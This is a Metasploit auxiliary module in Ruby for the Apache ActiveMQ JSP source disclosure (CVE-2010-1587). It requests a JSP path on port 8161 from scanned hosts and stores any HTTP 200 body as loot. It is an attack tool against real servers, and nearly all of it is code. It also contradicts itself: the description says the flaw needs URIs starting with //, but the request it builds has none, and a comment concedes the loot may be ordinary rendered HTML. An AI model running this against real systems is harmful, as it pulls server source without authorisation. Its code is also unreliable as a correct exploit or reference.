Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner for the Apache ActiveMQ JSP source disclosure referenced
# below as CVE-2010-1587 / AMQ-2700.
#
# For each scanned host the module sends one GET request for TARGETURI and,
# when the server answers with HTTP 200, stores the response body as loot.
#
# For assessment use: a stored body that contains unrendered JSP source shows
# the host still needs the vendor fix tracked in the AMQ-2700 reference.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',
        'Description' => %q{
          This module exploits a source code disclosure in Apache ActiveMQ. The
          vulnerability is due to the Jetty's ResourceHandler handling of specially crafted
          URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1
          over Windows 2003 SP2 and Ubuntu 10.04.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Veerendra G.G', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2010-1587' ],
          [ 'OSVDB', '64020' ],
          [ 'BID', '39636' ],
          [ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]
        ],
        # Reliability, stability and side effects are all declared as unknown,
        # so the module carries no classification an operator can rely on.
        # The code in this file issues a single GET and writes one loot entry.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # Defaults: port 8161 and the /admin/index.jsp path.
    register_options(
      [
        Opt::RPORT(8161),
        OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])
      ]
    )
  end

  # Requests TARGETURI from one host and stores a 200 response body as loot.
  #
  # @param ip [String] address of the host being scanned; recorded as the
  #   loot's host
  def run_host(ip)
    print_status("#{rhost}:#{rport} - Sending request...")

    request = {
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    }
    response = send_request_cgi(request)

    # NOTE(review): HTTP 200 is the only success criterion. A server that
    # renders the JSP normally can also answer 200, so the loot may hold
    # rendered HTML rather than source. Inspect the stored file before
    # recording a finding.
    unless response && response.code == 200
      print_error("#{rhost}:#{rport} - Failed to retrieve file")
      return
    end

    # The loot file is named after the last path component of TARGETURI.
    loot_name = File.basename(datastore['TARGETURI'])
    loot_path = store_loot(
      'apache.activemq',
      'text/plain',
      ip,
      response.body,
      loot_name
    )
    print_status("#{rhost}:#{rport} - File saved in: #{loot_path}")
  end
end